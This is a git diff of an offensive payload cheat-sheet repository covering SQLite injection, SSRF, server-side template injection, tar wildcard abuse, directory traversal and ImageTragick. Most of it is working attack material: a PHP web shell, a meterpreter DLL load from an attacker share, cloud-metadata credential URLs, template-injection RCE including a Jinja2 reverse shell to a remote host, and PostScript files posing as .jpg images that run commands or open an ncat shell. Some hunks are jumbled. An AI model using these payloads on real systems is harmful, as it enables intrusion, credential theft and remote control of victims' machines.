-  - [Exploiting Second Order SQLi Flaws by using Burp & Custom Sqlmap Tamper](https://pentest.blog/exploiting-second-order-sqli-flaws-by-using-burp-custom-sqlmap-tamper/)
+  * [Exploiting Second Order SQLi Flaws by using Burp & Custom Sqlmap Tamper](https://pentest.blog/exploiting-second-order-sqli-flaws-by-using-burp-custom-sqlmap-tamper/)
 * Sqlmap:
-  - [#SQLmap protip @zh4ck](https://twitter.com/zh4ck/status/972441560875970560)
+  * [#SQLmap protip @zh4ck](https://twitter.com/zh4ck/status/972441560875970560)
--- a/injection/SQLite
+++ b/injection/SQLite
@@ -1,53 +1,64 @@
 # SQLite Injection
 ## SQLite comments
 ```sql
 --
 /**/
 ```
 ## SQLite version
 ```sql
 select sqlite_version();
 ```
 ## Integer/String based - Extract table name
 ```sql
 SELECT tbl_name FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'
 ```
 Use limit X+1 offset X, to extract all tables.
 ## Integer/String based - Extract column name
 ```sql
 SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name NOT LIKE 'sqlite_%' AND name ='table_name'
 ```
 For a clean output
 ```sql
 SELECT replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(substr((substr(sql,instr(sql,'(')%2b1)),instr((substr(sql,instr(sql,'(')%2b1)),'')),"TEXT",''),"INTEGER",''),"AUTOINCREMENT",''),"PRIMARY KEY",''),"UNIQUE",''),"NUMERIC",''),"REAL",''),"BLOB",''),"NOT NULL",''),",",'~~') FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name NOT LIKE 'sqlite_%' AND name ='table_name'
 ```
 ## Boolean - Count number of tables
 ```sql
 and (SELECT count(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%' ) < number_of_table
 ```
 ## Boolean - Enumerating table name
 ```sql
 and (SELECT length(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name not like 'sqlite_%' limit 1 offset 0)=table_name_length_number
 ```
 ## Boolean - Extract info
 ```sql
 and (SELECT hex(substr(tbl_name,1,1)) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%' limit 1 offset 0) > hex('some_char')
 ```
 ## Time based
 ```sql
 AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))
 ```
 ## Remote Command Execution using SQLite command - Attach Database
 ```sql
 ATTACH DATABASE '/var/www/lol.php' AS lol;
 CREATE TABLE lol.pwn (dataz text);
@@ -55,10 +66,13 @@ INSERT INTO lol.pwn (dataz) VALUES ('<?system($_GET['cmd']); ?>');--
 ```
 ## Remote Command Execution using SQLite command - Load_extension
 ```sql
 UNION SELECT 1,load_extension('\\evilhost\evilshare\meterpreter.dll','DllMain');--
 ```
 Note: By default this component is disabled
 ## Thanks to
 [Injecting SQLite database based application - Manish Kishan Tanwar](https://www.exploit-db.com/docs/41397.pdf)
--- a/injection/README.md
+++ b/injection/README.md
@@ -1,10 +1,34 @@
 # Server-Side Request Forgery
-Server Side Request Forgery or SSRF is a vulnerability in which an attacker forces a server to perform requests on behalf of him.
+
 Server Side Request Forgery or SSRF is a vulnerability in which an attacker forces a server to perform requests on their behalf.
 Tools:
 - [SSRFmap - https://github.com/swisskyrepo/SSRFmap](https://github.com/swisskyrepo/SSRFmap)
 - [Gopherus - https://github.com/tarunkant/Gopherus](https://github.com/tarunkant/Gopherus)
 ## Summary
 * [Exploit with localhost](#summary)
 * [Bypassing filters](#summary)
 * [SSRF via URL Scheme](#summary)
 * [SSRF to XSS](#summary)
 * [SSRF URL for Cloud Instances](#summary)
  * [SSRF URL for AWS Bucket](#summary)
  * [SSRF URL for Google Cloud](#summary)
  * [SSRF URL for Digital Ocean](#summary)
  * [SSRF URL for Packetcloud](#summary)
  * [SSRF URL for Azure](#summary)
  * [SSRF URL for OpenStack/RackSpace](#summary)
  * [SSRF URL for HP Helion](#summary)
  * [SSRF URL for Oracle Cloud](#summary)
  * [SSRF URL for Alibaba](#summary)
 ## Exploit with localhost
 Basic SSRF v1
-```
+
 ```powershell
 http://127.0.0.1:80
 http://127.0.0.1:443
 http://127.0.0.1:22
@@ -13,63 +37,72 @@ http://0.0.0.0:443
 http://0.0.0.0:22
 ```
-Basic SSRF v2
+Basic SSRF - Alternative version
-```
+
 ```powershell
 http://localhost:80
 http://localhost:443
 http://localhost:22
 ```
 Advanced exploit using a redirection
-```
+
 ```powershell
 1. Create a subdomain pointing to 192.168.0.1 with DNS A record  e.g:ssrf.example.com
 2. Launch the SSRF: vulnerable.com/index.php?url=http://YOUR_SERVER_IP
 vulnerable.com will fetch YOUR_SERVER_IP which will redirect to 192.168.0.1
 ```
 Advanced exploit using type=url
-```
+
 ```powershell
 Change "type=file" to "type=url"
 Paste URL in text field and hit enter
 Using this vulnerability users can upload images from any image URL = trigger an SSRF
 ```
 ## Bypassing filters
 Bypass using HTTPS
-```
+
 ```powershell
 https://127.0.0.1/
 https://localhost/
 ```
 Bypass localhost with [::]
-```
+
 ```powershell
 http://[::]:80/
 http://[::]:25/ SMTP
 http://[::]:22/ SSH
 http://[::]:3128/ Squid
 ```
-```
+```powershell
 http://0000::1:80/
 http://0000::1:25/ SMTP
 http://0000::1:22/ SSH
 http://0000::1:3128/ Squid
 ```
 Bypass localhost with a domain redirecting to locahost
-```
+
 ```powershell
 http://localtest.me
 http://n-pn.info
 http://customer1.app.localhost.my.company.127.0.0.1.nip.io
 http://mail.ebc.apple.com redirect to 127.0.0.6 == localhost
 ```
 The service nip.io is awesome for that, it will convert any ip address as a dns.
-```
+
 ```powershell
 NIP.IO maps <anything>.<IP Address>.nip.io to the corresponding <IP Address>, even 127.0.0.1.nip.io maps to 127.0.0.1
 ```
 Bypass localhost with CIDR : 127.x.x.x
-```
+
 ```powershell
 it's a /8
 http://127.127.127.127
 http://127.0.1.3
@@ -77,7 +110,8 @@ http://127.0.0.0
 ```
 Bypass using a decimal ip location
-```
+
 ```powershell
 http://0177.0.0.1/
 http://2130706433/ = http://127.0.0.1
 http://3232235521/ = http://192.168.0.1
@@ -85,25 +119,28 @@ http://3232235777/ = http://192.168.1.1
 ```
 Bypass using malformed urls
-```
+
 ```powershell
 localhost:+11211aaa
 localhost:00011211aaaa
 ```
 Bypass using rare address
-```
+
 ```powershell
 http://0/
 ```
 Bypass using bash variables (curl only)
 ```
 curl -v "http://evil$google.com"
 ```powershell
 curl -v "http://evil$google.com"
 $google = ""
 ```
 Bypass using tricks combination
-```
+
 ```powershell
 http://1.1.1.1 &@2.2.2.2# @3.3.3.3/
 urllib2 : 1.1.1.1
 requests + browsers : 2.2.2.2
@@ -111,40 +148,64 @@ urllib : 3.3.3.3
 ```
 Bypass using enclosed alphanumerics [@EdOverflow](https://twitter.com/EdOverflow)
-```
+
 ```powershell
 http://ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ = example.com
 List:
 ① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ ⑪ ⑫ ⑬ ⑭ ⑮ ⑯ ⑰ ⑱ ⑲ ⑳ ⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⑽ ⑾ ⑿ ⒀ ⒁ ⒂ ⒃ ⒄ ⒅ ⒆ ⒇ ⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒑ ⒒ ⒓ ⒔ ⒕ ⒖ ⒗ ⒘ ⒙ ⒚ ⒛ ⒜ ⒝ ⒞ ⒟ ⒠ ⒡ ⒢ ⒣ ⒤ ⒥ ⒦ ⒧ ⒨ ⒩ ⒪ ⒫ ⒬ ⒭ ⒮ ⒯ ⒰ ⒱ ⒲ ⒳ ⒴ ⒵ Ⓐ Ⓑ Ⓒ Ⓓ Ⓔ Ⓕ Ⓖ Ⓗ Ⓘ Ⓙ Ⓚ Ⓛ Ⓜ Ⓝ Ⓞ Ⓟ Ⓠ Ⓡ Ⓢ Ⓣ Ⓤ Ⓥ Ⓦ Ⓧ Ⓨ Ⓩ ⓐ ⓑ ⓒ ⓓ ⓔ ⓕ ⓖ ⓗ ⓘ ⓙ ⓚ ⓛ ⓜ ⓝ ⓞ ⓟ ⓠ ⓡ ⓢ ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ ⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴ ⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿
 ```
 Bypass against a weak parser - by Orange Tsai ([Blackhat A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf](https://www.blackhat.com/docs/us-17/thursday/us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf))
 ```powershell
 http://127.1.1.1:80\@127.2.2.2:80/
 http://127.1.1.1:80\@@127.2.2.2:80/
 http://127.1.1.1:80:\@@127.2.2.2:80/
 http://127.1.1.1:80#\@127.2.2.2:80/
 ```
 ![https://github.com/swisskyrepo/PayloadsAllTheThings/raw/master/SSRF%20injection/SSRF_Parser.png](https://github.com/swisskyrepo/PayloadsAllTheThings/raw/master/SSRF%20injection/WeakParser.jpg)
 ## SSRF via URL Scheme
-Dict://   
+File Wrapper
-The DICT URL scheme is used to refer to definitions or word lists available using the DICT protocol:
+
 ```powershell
 file:///etc/passwd
 file://\/\/etc/passwd
 ```
 Dict Wrapper
 The DICT URL scheme is used to refer to definitions or word lists available using the DICT protocol:
 ```powershell
 dict://<user>;<auth>@<host>:<port>/d:<word>:<database>:<n>
 ssrf.php?url=dict://attacker:11111/
 ```
-Sftp://
+Sftp Wrapper
-```
+
 ```powershell
 ssrf.php?url=sftp://evil.com:11111/
 ```
-Tftp://
+Tftp Wrapper
-```
+
 ```powershell
 ssrf.php?url=tftp://evil.com:12346/TESTUDPPACKET
 ```
-Ldap://
+Ldap Wrapper
-```
+
 ```powershell
 ssrf.php?url=ldap://localhost:11211/%0astats%0aquit
 ```
-Gopher://
+Gopher Wrapper
-```
+
 ```powershell
 ssrf.php?url=gopher://127.0.0.1:25/xHELO%20localhost%250d%250aMAIL%20FROM%3A%3Chacker@site.com%3E%250d%250aRCPT%20TO%3A%3Cvictim@site.com%3E%250d%250aDATA%250d%250aFrom%3A%20%5BHacker%5D%20%3Chacker@site.com%3E%250d%250aTo%3A%20%3Cvictime@site.com%3E%250d%250aDate%3A%20Tue%2C%2015%20Sep%202017%2017%3A20%3A26%20-0400%250d%250aSubject%3A%20AH%20AH%20AH%250d%250a%250d%250aYou%20didn%27t%20say%20the%20magic%20word%20%21%250d%250a%250d%250a%250d%250a.%250d%250aQUIT%250d%250a
 will make a request like
@@ -164,7 +225,8 @@ You didn't say the magic word !
 QUIT
 ```
-Gopher:// SMTP - Back connect to 1337
+Gopher SMTP - Back connect to 1337
 ```php
 Content of evil.com/redirect.php:
 <?php
@@ -174,7 +236,9 @@ header("Location: gopher://hack3r.site:1337/_SSRF%0ATest!");
 Now query it.
 https://example.com/?q=http://evil.com/redirect.php.
 ```
-Gopher:// SMTP - send a mail
+
 Gopher SMTP - send a mail
 ```php
 Content of evil.com/redirect.php:
 <?php
@@ -195,25 +259,30 @@ Content of evil.com/redirect.php:
 ```
 ## SSRF to XSS by [@D0rkerDevil & @alyssa.o.herrera](https://medium.com/@D0rkerDevil/how-i-convert-ssrf-to-xss-in-a-ssrf-vulnerable-jira-e9f37ad5b158)
 ```bash
-http://brutelogic.com.br/poc.svg -> simple alert   
+http://brutelogic.com.br/poc.svg -> simple alert
 https://website.mil/plugins/servlet/oauth/users/icon-uri?consumerUri= -> simple ssrf
 https://website.mil/plugins/servlet/oauth/users/icon-uri?consumerUri=http://brutelogic.com.br/poc.svg
 ```
 ## SSRF URL for Cloud Instances
 ### SSRF URL for AWS Bucket
-## SSRF on AWS Bucket - [Docs](http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories)
+[Docs](http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories)
-Interesting path to look for at http://169.254.169.254
+Interesting path to look for at `http://169.254.169.254`
-```
+
 ```powershell
 Always here : /latest/meta-data/{hostname,public-ipv4,...}
 User data (startup script for auto-scaling) : /latest/user-data
 Temporary AWS credentials : /latest/meta-data/iam/security-credentials/
 ```
 DNS record
-```
+
 ```powershell
 http://169.254.169.254
 http://metadata.nicob.net/
 http://169.254.169.254.xip.io/
@@ -222,13 +291,15 @@ http://www.owasp.org.1ynrnhl.xip.io/
 ```
 HTTP redirect
-```
+
 ```powershell
 Static:http://nicob.net/redir6a
 Dynamic:http://nicob.net/redir-http-169.254.169.254:80-
 ```
 Alternate IP encoding
-```
+
 ```powershell
 http://425.510.425.510/ Dotted decimal with overflow
 http://2852039166/ Dotless decimal
 http://7147006462/ Dotless decimal with overflow
@@ -240,22 +311,27 @@ http://0251.00376.000251.0000376/ Dotted octal with padding
 ```
 More urls to include
-```
+
 ```powershell
 http://169.254.169.254/latest/user-data
 http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
 http://169.254.169.254/latest/meta-data/
 http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
 http://169.254.169.254/latest/meta-data/iam/security-credentials/PhotonInstance
 http://169.254.169.254/latest/meta-data/ami-id
 http://169.254.169.254/latest/meta-data/reservation-id
 http://169.254.169.254/latest/meta-data/hostname
 http://169.254.169.254/latest/meta-data/public-keys/
 http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
 http://169.254.169.254/latest/meta-data/public-keys/[ID]/openssh-key
 http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy
 ```
-## SSRF URL for Google Cloud
+### SSRF URL for Google Cloud
 Requires the header "Metadata-Flavor: Google" or "X-Google-Metadata-Request: True"
-```
+
 ```powershell
 http://169.254.169.254/computeMetadata/v1/
 http://metadata.google.internal/computeMetadata/v1/
 http://metadata/computeMetadata/v1/
@@ -264,19 +340,23 @@ http://metadata.google.internal/computeMetadata/v1/instance/id
 http://metadata.google.internal/computeMetadata/v1/project/project-id
 ```
-Google allows recursive pulls 
+Google allows recursive pulls
-```
+
 ```powershell
 http://metadata.google.internal/computeMetadata/v1/instance/disks/?recursive=true
 ```
 Beta does NOT require a header atm (thanks Mathias Karlsson @avlidienbrunn)
-```
+
 ```powershell
 http://metadata.google.internal/computeMetadata/v1beta1/
 http://metadata.google.internal/computeMetadata/v1beta1/?recursive=true
 ```
 ### SSRF URL for Digital Ocean
 Documentation available at `https://developers.digitalocean.com/documentation/metadata/`
 ## SSRF URL for Digital Ocean
 https://developers.digitalocean.com/documentation/metadata/
 ```powershell
 curl http://169.254.169.254/metadata/v1/id
 http://169.254.169.254/metadata/v1.json
@@ -291,52 +371,88 @@ All in one request:
 curl http://169.254.169.254/metadata/v1.json | jq
 ```
-## SSRF URL for Packetcloud
+### SSRF URL for Packetcloud
 ```
 https://metadata.packet.net/userdata
 ```
-## SSRF URL for Azure
+Documentation available at `https://metadata.packet.net/userdata`
-Limited, maybe more exist? https://azure.microsoft.com/en-us/blog/what-just-happened-to-my-vm-in-vm-metadata-service/
+
-```
+### SSRF URL for Azure
 Limited, maybe more exists? `https://azure.microsoft.com/en-us/blog/what-just-happened-to-my-vm-in-vm-metadata-service/`
 ```powershell
 http://169.254.169.254/metadata/v1/maintenance
 ```
-Update Apr 2017, Azure has more support; requires the header "Metadata: true"  https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service
+Update Apr 2017, Azure has more support; requires the header "Metadata: true" `https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service`
-```
+
 ```powershell
 http://169.254.169.254/metadata/instance?api-version=2017-04-02
 http://169.254.169.254/metadata/instance/network/interface/0/ipv4/ipAddress/0/publicIpAddress?api-version=2017-04-02&format=text
 ```
-## SSRF URL for OpenStack/RackSpace 
+### SSRF URL for OpenStack/RackSpace
 (header required? unknown)
-```
+
 ```powershell
 http://169.254.169.254/openstack
 ```
-## SSRF URL for HP Helion 
+### SSRF URL for HP Helion
 (header required? unknown)
-```
+
 ```powershell
 http://169.254.169.254/2009-04-04/meta-data/ 
 ```
-## SSRF URL for Oracle Cloud
+### SSRF URL for Oracle Cloud
-```
+
 ```powershell
 http://192.0.0.192/latest/
 http://192.0.0.192/latest/user-data/
 http://192.0.0.192/latest/meta-data/
 http://192.0.0.192/latest/attributes/
 ```
-## SSRF URL for Alibaba
+### SSRF URL for Alibaba
-```
+
 ```powershell
 http://100.100.100.200/latest/meta-data/
 http://100.100.100.200/latest/meta-data/instance-id
 http://100.100.100.200/latest/meta-data/image-id
 ```
 ### SSRF URL for Kubernetes ETCD
 Can contain API keys and internal ip and ports
 ```powershell
 curl -L http://127.0.0.1:2379/version
 curl http://127.0.0.1:2379/v2/keys/?recursive=true
 ```
 ### SSRF URL for Docker
 ```powershell
 http://127.0.0.1:2375/v1.24/containers/json
 Simple example
 docker run -ti -v /var/run/docker.sock:/var/run/docker.sock bash
 bash-4.4# curl --unix-socket /var/run/docker.sock http://foo/containers/json
 bash-4.4# curl --unix-socket /var/run/docker.sock http://foo/images/json
 ```
 ### SSRF URL for Rancher
 ```powershell
 curl http://rancher-metadata/<version>/<path>
 ```
 More info: https://rancher.com/docs/rancher/v1.6/en/rancher-services/metadata-service/
 ## Thanks to
 * [Hackerone - How To: Server-Side Request Forgery (SSRF)](https://www.hackerone.com/blog-How-To-Server-Side-Request-Forgery-SSRF)
 * [Awesome URL abuse for SSRF by @orange_8361 #BHUSA](https://twitter.com/albinowax/status/890725759861403648)
 * [How I Chained 4 vulnerabilities on GitHub Enterprise, From SSRF Execution Chain to RCE! Orange Tsai](http://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html)
@@ -349,4 +465,5 @@ http://100.100.100.200/latest/meta-data/image-id
 * [Hacking the Hackers: Leveraging an SSRF in HackerTarget - @sxcurity](http://www.sxcurity.pro/2017/12/17/hackertarget/)
 * [PHP SSRF @secjuice](https://medium.com/secjuice/php-ssrf-techniques-9d422cb28d51)
 * [How I convert SSRF to xss in a ssrf vulnerable Jira](https://medium.com/@D0rkerDevil/how-i-convert-ssrf-to-xss-in-a-ssrf-vulnerable-jira-e9f37ad5b158)
-* [Piercing the Veil: Server Side Request Forgery to NIPRNet access](https://medium.com/bugbountywriteup/piercing-the-veil-server-side-request-forgery-to-niprnet-access-c358fd5e249a)
+* [Piercing the Veil: Server Side Request Forgery to NIPRNet access](https://medium.com/bugbountywriteup/piercing-the-veil-server-side-request-forgery-to-niprnet-access-c358fd5e249a)
 * [Hacker101 SSRF](https://www.youtube.com/watch?v=66ni2BTIjS8)
--- a/injection/WeakParser.jpg
+++ b/injection/WeakParser.jpg
--- a/injections/README.md
+++ b/injections/README.md
@@ -1,28 +1,34 @@
 # Templates Injections
-> Template injection allows an attacker to include template code into an existant (or not) template.     
+> Template injection allows an attacker to include template code into an existant (or not) template.
 Recommended tool: [Tplmap](https://github.com/epinna/tplmap)
 e.g:
 ```
 ./tplmap.py --os-shell -u 'http://www.target.com/page?name=John'
 ```
 ```powershell
 python2.7 ./tplmap.py -u 'http://www.target.com/page?name=John*' --os-shell
 python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=*&comment=supercomment&link"
 python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=InjectHere*&comment=A&link" --level 5 -e jade
 ```
 ## Ruby
 ### Basic injection
 ```python
 <%= 7 * 7 %>
 ```
 ### Retrieve /etc/passwd
 ```python
 <%= File.open('/etc/passwd').read %>
 ```
 ## Java
-### Basic injection
+
 ### Java - Basic injection
 ```java
 ${7*7}
 ${{7*7}}
@@ -31,24 +37,31 @@ ${class.getResource("").getPath()}
 ${class.getResource("../../../../../index.htm").getContent()}
 ```
-### Retrieve the system’s environment variables.
+### Java - Retrieve the system’s environment variables
 ```java
 ${T(java.lang.System).getenv()}
 ```
-### Retrieve /etc/passwd
+### Java - Retrieve /etc/passwd
 ```java
 ${T(java.lang.Runtime).getRuntime().exec('cat etc/passwd')}
 ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}
 ```
 ## Twig
-### Basic injection
+
 ### Twig - Basic injection
 ```python
 {{7*7}}
 {{7*'7'}} would result in 49
 ```
-### Template format
+### Twig - Template format
 ```python
 $output = $twig > render (
  'Dear' . $_GET['custom_greeting'],
@@ -61,28 +74,32 @@ $output = $twig > render (
 );
 ```
-### Code execution
+### Twig - Code execution
 ```python
 {{self}}
 {{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}}
 {{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
 ```
 ## Smarty
 ```python
 {php}echo `id`;{/php}
 {Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php passthru($_GET['cmd']); ?>",self::clearConfig())}
 ```
 ## Freemarker
 Default functionality.
 ```python
 <#assign
 ex = "freemarker.template.utility.Execute"?new()>${ ex("id")}
 ```
 ## Jade / Codepen
 ```python
 - var x = root.process
 - x = x.mainModule.require
@@ -91,6 +108,7 @@ ex = "freemarker.template.utility.Execute"?new()>${ ex("id")}
 ```
 ## Velocity
 ```python
 #set($str=$class.inspect("java.lang.String").type)
 #set($chr=$class.inspect("java.lang.Character").type)
@@ -103,6 +121,7 @@ $str.valueOf($chr.toChars($out.read()))
 ```
 ## Mako
 ```python
 <%
 import os
@@ -111,13 +130,13 @@ x=os.popen('id').read()
 ${x}
 ```
 ## Jinja2
 [Official website](http://jinja.pocoo.org/)
 > Jinja2 is a full featured template engine for Python. It has full unicode support, an optional integrated sandboxed execution environment, widely used and BSD licensed.
 ### Jinja 2 - Basic injection
 ### Basic injection
 ```python
 {{4*4}}[[5*5]]
 {{7*'7'}} would result in 7777777
@@ -125,7 +144,9 @@ ${x}
 Jinja2 is used by Python Web Frameworks such as Django or Flask.
 The above injections have been tested on Flask application.
-### Template format
+
 ### Jinja2 - Template format
 ```python
 {% extends "layout.html" %}
 {% block body %}
@@ -138,12 +159,16 @@ The above injections have been tested on Flask application.
 ```
-### Dump all used classes
+### Jinja2 - Dump all used classes
 ```python
 {{ [].class.base.subclasses() }}
 {{''.class.mro()[1].subclasses()}}
 {{ ''.__class__.__mro__[2].__subclasses__() }}
 ```
-### Dump all config variables
+### Jinja2 - Dump all config variables
 ```python
 {% for key, value in config.iteritems() %}
    <dt>{{ key|e }}</dt>
@@ -151,33 +176,56 @@ The above injections have been tested on Flask application.
 {% endfor %}
 ```
-### Read remote file
+### Jinja2 - Read remote file
 ```python
 # ''.__class__.__mro__[2].__subclasses__()[40] = File class
 {{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}
 ```
-### Write into remote file
+### Jinja2 - Write into remote file
 ```python
 {{ ''.__class__.__mro__[2].__subclasses__()[40]('/var/www/html/myflaskapp/hello.txt', 'w').write('Hello here !') }}
 ```
-### Remote Code Execution via reverse shell
+### Jinja2 - Remote Code Execution via reverse shell
 Listen for connexion
-```
+
 ```bash
 nv -lnvp 8000
 ```
 Inject this template
 ```python
 {{ ''.__class__.__mro__[2].__subclasses__()[40]('/tmp/evilconfig.cfg', 'w').write('from subprocess import check_output\n\nRUNCMD = check_output\n') }} # evil config
 {{ config.from_pyfile('/tmp/evilconfig.cfg') }}  # load the evil config
 {{ config['RUNCMD']('bash -i >& /dev/tcp/xx.xx.xx.xx/8000 0>&1',shell=True) }} # connect to evil host
 ```
 ## Client Side Template Injection
 ### AngularJS
 ```javascript
 $eval('1+1')
 {{1+1}}
 ```
 ### Vue JS
 ```javascript
 {{constructor.constructor('alert(1)')()}}
 ```
 ## Thanks to
- * [https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/](https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/)
+
- * [Yahoo! RCE via Spring Engine SSTI](https://hawkinsecurity.com/2017/12/13/rce-via-spring-engine-ssti/)
+* [https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/](https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/)
- * [Ruby ERB Template injection - TrustedSec](https://www.trustedsec.com/2017/09/rubyerb-template-injection/)
+* [Yahoo! RCE via Spring Engine SSTI](https://hawkinsecurity.com/2017/12/13/rce-via-spring-engine-ssti/)
- * [Gist - Server-Side Template Injection - RCE For the Modern WebApp by James Kettle (PortSwigger)](https://gist.github.com/Yas3r/7006ec36ffb987cbfb98)
+* [Ruby ERB Template injection - TrustedSec](https://www.trustedsec.com/2017/09/rubyerb-template-injection/)
- * [PDF - Server-Side Template Injection: RCE for the modern webapp - @albinowax](https://www.blackhat.com/docs/us-15/materials/us-15-Kettle-Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-wp.pdf)
+* [Gist - Server-Side Template Injection - RCE For the Modern WebApp by James Kettle (PortSwigger)](https://gist.github.com/Yas3r/7006ec36ffb987cbfb98)
- * [VelocityServlet Expression Language injection](https://magicbluech.github.io/2017/12/02/VelocityServlet-Expression-language-Injection/)
+* [PDF - Server-Side Template Injection: RCE for the modern webapp - @albinowax](https://www.blackhat.com/docs/us-15/materials/us-15-Kettle-Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-wp.pdf)
 * [VelocityServlet Expression Language injection](https://magicbluech.github.io/2017/12/02/VelocityServlet-Expression-language-Injection/)
 * [Cheatsheet - Flask & Jinja2 SSTI - Sep 3, 2018 • By phosphore](https://pequalsnp-team.github.io/cheatsheet/flask-jinja2-ssti)
--- a/injections/serverside.png
+++ b/injections/serverside.png
--- a/execution/README.md
+++ b/execution/README.md
@@ -1,14 +1,19 @@
 # TAR Command Execution
-By using tar with –checkpoint-action options, a specified action can be used after a checkpoint. This action could be a malicious shell script that could be used for executing arbitrary commands under the user who starts tar. “Tricking” root to use the specific options is quite easy, and that’s where the wildcard comes in handy.	
+
 By using tar with –checkpoint-action options, a specified action can be used after a checkpoint. This action could be a malicious shell script that could be used for executing arbitrary commands under the user who starts tar. “Tricking” root to use the specific options is quite easy, and that’s where the wildcard comes in handy.
 ## Exploit
 These files work against a "tar *"
-```
+
 ```powershell
 --checkpoint=1
 --checkpoint-action=exec=sh shell.sh
 shell.sh   (your exploit code is here)
 ```
 ## Thanks to
-* 
+
 * [Exploiting wildcards on Linux - Berislav Kucan](https://www.helpnetsecurity.com/2014/06/27/exploiting-wildcards-on-linux/)
 * [Code Execution With Tar Command - p4pentest](http://p4pentest.in/2016/10/19/code-execution-with-tar-command/)
 * [Back To The Future: Unix Wildcards Gone Wild - Leon Juranic](http://www.defensecode.com/public/DefenseCode_Unix_WildCards_Gone_Wild.txt)
--- a/directory/README.md
+++ b/directory/README.md
@@ -1,9 +1,12 @@
 # Traversal Directory
 A directory traversal consists in exploiting insufficient security validation / sanitization of user-supplied input file names, so that characters representing "traverse to parent directory" are passed through to the file APIs.
 ## Exploit
 Basic
-```
+
 ```powershell
 ../
 ..\
 ..\/
@@ -17,27 +20,29 @@ Basic
 ```
 16 bit Unicode encoding
-```
+
 ```powershell
 . = %u002e
 / = %u2215
 \ = %u2216
 ```
 Double URL encoding
-```
+
 ```powershell
 . = %252e
 / = %252f
-\ = %255c     
+\ = %255c
 ```
 UTF-8 Unicode encoding
-```
+
 ```powershell
 . = %c0%2e, %e0%40%ae, %c0ae
 / = %c0%af, %e0%80%af, %c0%2f
 \ = %c0%5c, %c0%80%5c
 ```
 ## Thanks to
- * https://twitter.com/huykha10/status/962419695470174208
+
 * [Directory traversal attack - Wikipedia](https://en.wikipedia.org/wiki/Directory_traversal_attack)
--- a/2/README.md
+++ b/2/README.md
@@ -0,0 +1,22 @@
 # Image Tragik 2
 ## Exploit
 Simple `id` payload
 ```powershell
 %!PS
 userdict /setpagedevice undef
 save
 legal
 { null restore } stopped { pop } if
 { legal } stopped { pop } if
 restore
 mark /OutputFile (%pipe%id) currentdevice putdeviceprops
 ```
 then use `convert shellexec.jpeg whatever.gif`
 ## Thanks to
 * [openwall.com/lists/oss-security/2018/08/21/2 by Tavis Ormandy](http://openwall.com/lists/oss-security/2018/08/21/2)
--- a/2/centos_id.jpg
+++ b/2/centos_id.jpg
@@ -0,0 +1,6 @@
 %!PS
 userdict /setpagedevice undef
 legal
 { null restore } stopped { pop } if
 legal
 mark /OutputFile (%pipe%id) currentdevice putdeviceprops
--- a/2/ubuntu_id.jpg
+++ b/2/ubuntu_id.jpg
@@ -0,0 +1,8 @@
 %!PS
 userdict /setpagedevice undef
 save
 legal
 { null restore } stopped { pop } if
 { legal } stopped { pop } if
 restore
 mark /OutputFile (%pipe%id) currentdevice putdeviceprops
--- a/2/ubuntu_shell.jpg
+++ b/2/ubuntu_shell.jpg
@@ -0,0 +1,8 @@
 %!PS
 userdict /setpagedevice undef
 save
 legal
 { null restore } stopped { pop } if
 { legal } stopped { pop } if
 restore
 mark /OutputFile (%pipe%ncat 127.0.0.1 4242 -e /bin/sh) currentdevice putdeviceprops
